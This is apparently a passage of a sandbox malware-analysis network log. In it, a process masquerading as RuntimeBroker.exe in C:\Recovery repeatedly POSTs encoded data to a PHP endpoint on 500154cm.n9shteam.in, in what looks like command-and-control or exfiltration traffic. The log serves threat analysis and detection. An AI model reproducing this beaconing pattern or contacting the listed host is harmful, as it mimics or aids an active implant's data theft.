                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            106192.168.2.45011337.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:41.956615925 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            107192.168.2.45011437.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:42.191817999 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1840
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:42.542426109 CET1840OUTData Raw: 54 56 5e 51 56 5e 59 59 5c 58 5a 51 50 58 58 54 5b 56 5e 5a 55 5f 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TV^QV^YY\XZQPXXT[V^ZU_ZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'-2]>89S"/&0%;"8U(#6!8%'->>!#5_?&[!"^.!
                                                                                                            Nov 12, 2024 00:43:42.759407997 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:42.836110115 CET308INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:42 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 22 0c 28 13 0d 13 22 05 2c 19 2e 3e 2d 0c 31 30 28 13 3f 38 3b 01 36 3e 2b 00 3b 20 39 56 20 3e 06 5a 27 3a 36 07 20 2f 21 52 3c 02 21 5b 05 12 21 17 20 3b 01 0d 29 3f 30 1c 2e 0f 33 5a 35 0e 38 05 2d 07 34 0c 3e 00 22 0b 27 05 31 0d 26 32 27 01 2e 2e 31 06 3c 3f 2b 56 21 0e 2e 55 0b 11 23 18 30 38 24 0f 23 3f 0d 5f 26 00 3b 0d 35 03 04 56 25 3a 20 1f 25 2a 2f 5d 31 0f 29 00 32 31 21 00 26 03 39 5a 2a 2a 27 59 33 3a 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: "(",.>-10(?8;6>+; 9V >Z':6 /!R<![! ;)?0.3Z58-4>"'1&2'..1<?+V!.U#08$#?_&;5V%: %*/]1)21!&9Z**'Y3:#Q-/V=[W


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            108192.168.2.45011537.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:42.315013885 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:42.667450905 CET2512OUTData Raw: 54 52 5b 57 56 5b 5c 58 5c 58 5a 51 50 5c 58 55 5b 53 5e 59 55 55 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TR[WV[\X\XZQP\XU[S^YUUZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'X906[*&#,E%%Z!^;=0665W0>!Y=5>\ *(&[!"^.1
                                                                                                            Nov 12, 2024 00:43:42.885152102 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:42.960433960 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:42 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            109192.168.2.45011637.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:43.096551895 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:43:43.454417944 CET2512OUTData Raw: 54 50 5b 54 56 5a 5c 58 5c 58 5a 51 50 5d 58 50 5b 54 5e 50 55 54 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TP[TVZ\X\XZQP]XP[T^PUTZ^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$:\)%6/:@'5,S*U5"($-)X)C=7-Z+5&[!"^.
                                                                                                            Nov 12, 2024 00:43:43.663463116 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:43.743866920 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:43 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            110192.168.2.45011737.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:43.875674963 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:44.229233980 CET2512OUTData Raw: 51 56 5b 52 53 5c 59 58 5c 58 5a 51 50 5d 58 56 5b 5c 5e 5a 55 5f 5a 5b 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QV[RS\YX\XZQP]XV[\^ZU_Z[__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$-2]*!#/:B0&4!4R)0*X6(!Q3>%Y>= 5])%&[!"^.
                                                                                                            Nov 12, 2024 00:43:44.462975025 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:44.541424036 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:44 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            111192.168.2.45011837.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:44.669426918 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:45.026789904 CET2512OUTData Raw: 51 53 5b 55 53 5f 59 5d 5c 58 5a 51 50 58 58 52 5b 5c 5e 5d 55 5a 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS[US_Y]\XZQPXXR[\^]UZZ^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\', 2^*(%S#?&3%+";?>3._6)P0Z(&= 39(%&[!"^.!
                                                                                                            Nov 12, 2024 00:43:45.151088953 CET1236OUTData Raw: 00 2e 06 1a 03 55 04 34 28 3c 20 3c 39 05 58 12 02 5b 1b 3c 27 31 58 08 30 16 2f 5f 35 58 44 1a 00 32 51 15 3e 32 09 24 38 39 32 2e 3e 3c 04 51 04 3d 21 15 31 07 32 38 0f 38 1d 17 31 04 02 5e 37 08 2f 16 3a 09 16 3f 31 5c 3c 57 27 39 3e 2c 0a 2f
                                                                                                            Data Ascii: .U4(< <9X[<'1X0/_5XD2Q>2$892.><Q=!12881^7/:?1\<W'9>,/%/<+-51Y."V4[+9+9=8)?X!>5(:(+P<_<;%0^2U<>('9#][#7%=:-*81>=5<<10Y]9,";9_3&_'.R+!=9&::702;=2AV811^9-%
                                                                                                            Nov 12, 2024 00:43:45.557291031 CET1236OUTData Raw: 51 53 5b 55 53 5f 59 5d 5c 58 5a 51 50 58 58 52 5b 5c 5e 5d 55 5a 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS[US_Y]\XZQPXXR[\^]UZZ^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\', 2^*(%S#?&3%+";?>3._6)P0Z(&= 39(%&[!"^.!
                                                                                                            Nov 12, 2024 00:43:45.768650055 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:45.768773079 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:45.768892050 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:45.771406889 CET1276OUTData Raw: 3a 5d 26 16 33 00 22 2a 02 26 22 10 3a 09 14 05 2b 56 5a 5f 3f 5b 04 21 25 01 00 18 3d 2c 10 28 34 03 16 2a 33 06 3d 21 00 2e 06 1a 03 55 04 34 28 3c 20 3c 39 05 58 12 02 5b 1b 3c 27 31 58 08 30 16 2f 5f 35 58 44 1a 00 32 51 15 3e 32 09 24 38 39
                                                                                                            Data Ascii: :]&3"*&":+VZ_?[!%=,(4*3=!.U4(< <9X[<'1X0/_5XD2Q>2$892.><Q=!12881^7/:?1\<W'9>,/%/<+-51Y."V4[+9+9=8)?X!>5(:(+P<_<;%0^2U<>('9#][#7%=:-*81>=5<<10Y]9,";9_3&_'.R+!=
                                                                                                            Nov 12, 2024 00:43:46.012969971 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:45 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            112192.168.2.45011937.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:46.446635008 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:46.792510986 CET2512OUTData Raw: 54 56 5b 54 56 59 59 5a 5c 58 5a 51 50 5d 58 53 5b 53 5e 5d 55 58 5a 58 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TV[TVYYZ\XZQP]XS[S^]UXZX__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$- >_?+&!/"3("8U*3%":0--Z(69 5^(5&[!"^.
                                                                                                            Nov 12, 2024 00:43:47.012706995 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:47.102960110 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:46 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            113192.168.2.45012037.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:47.231093884 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:47.589257956 CET2512OUTData Raw: 51 56 5e 55 56 5a 5c 5d 5c 58 5a 51 50 59 58 57 5b 50 5e 5d 55 55 5a 55 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QV^UVZ\]\XZQPYXW[P^]UUZU__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$95*1T!>@3%;!+$V>:[693>>& #9_+&[!"^.%
                                                                                                            Nov 12, 2024 00:43:47.816188097 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:47.899507046 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:47 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            114192.168.2.45012137.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:47.845331907 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1840
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:48.198184967 CET1840OUTData Raw: 54 51 5b 57 56 5e 5c 5a 5c 58 5a 51 50 52 58 53 5b 50 5e 51 55 59 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TQ[WV^\Z\XZQPRXS[P^QUYZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$-0=-S!<.$7!$U>3!.'*(5:[40)\)5&[!"^.
                                                                                                            Nov 12, 2024 00:43:48.416018009 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:48.495001078 CET308INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:48 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 21 57 2a 2d 2f 5a 35 2f 2c 52 2e 58 2e 51 25 20 06 5b 2b 28 38 58 21 3d 3c 11 3b 23 26 08 22 3e 33 07 27 04 08 03 22 2f 22 0f 2b 02 21 5b 05 12 22 03 20 2b 09 09 29 2f 27 07 2d 0f 2f 5d 22 56 3b 1b 39 00 2c 09 3d 07 39 10 30 5a 31 0f 33 32 38 58 2d 58 2d 01 3c 11 33 1d 22 24 2e 55 0b 11 23 55 24 2b 2c 09 37 2f 0e 00 26 10 24 1d 36 04 31 0b 26 14 28 54 25 29 3f 59 24 21 26 10 31 32 0f 00 27 39 36 06 3e 29 2f 1f 24 10 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: !W*-/Z5/,R.X.Q% [+(8X!=<;#&">3'"/"+![" +)/'-/]"V;9,=90Z1328X-X-<3"$.U#U$+,7/&$61&(T%)?Y$!&12'96>)/$#Q-/V=[W


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            115192.168.2.45012237.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:48.280769110 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:48.638767958 CET2512OUTData Raw: 54 57 5b 55 56 59 59 53 5c 58 5a 51 50 52 58 57 5b 57 5e 5e 55 5b 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TW[UVYYS\XZQPRXW[W^^U[ZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$-V*_>+"Z=060!?*6Z!^"%.*.X#?5&[!"^.
                                                                                                            Nov 12, 2024 00:43:48.865545988 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:48.946394920 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:48 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            116192.168.2.45012337.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:49.128282070 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:43:49.479324102 CET2512OUTData Raw: 51 56 5b 5f 56 5e 5c 5a 5c 58 5a 51 50 5c 58 51 5b 55 5e 5e 55 59 5a 5b 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QV[_V^\Z\XZQP\XQ[U^^UYZ[__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'- 5=+)5<*'C4Y6^<)6(=$-=%% 3*<%&[!"^.1
                                                                                                            Nov 12, 2024 00:43:49.712791920 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:49.792721987 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:49 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            117192.168.2.45012437.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:49.919897079 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:50.276292086 CET2512OUTData Raw: 54 5f 5b 5f 56 5d 5c 58 5c 58 5a 51 50 5e 58 5d 5b 51 5e 5d 55 59 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T_[_V]\X\XZQP^X][Q^]UYZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\':0*-T!<5'/!84)#X6;*$>5\*540)]+5&[!"^.9
                                                                                                            Nov 12, 2024 00:43:50.516762972 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:50.595385075 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:50 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            118192.168.2.45012537.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:50.729865074 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
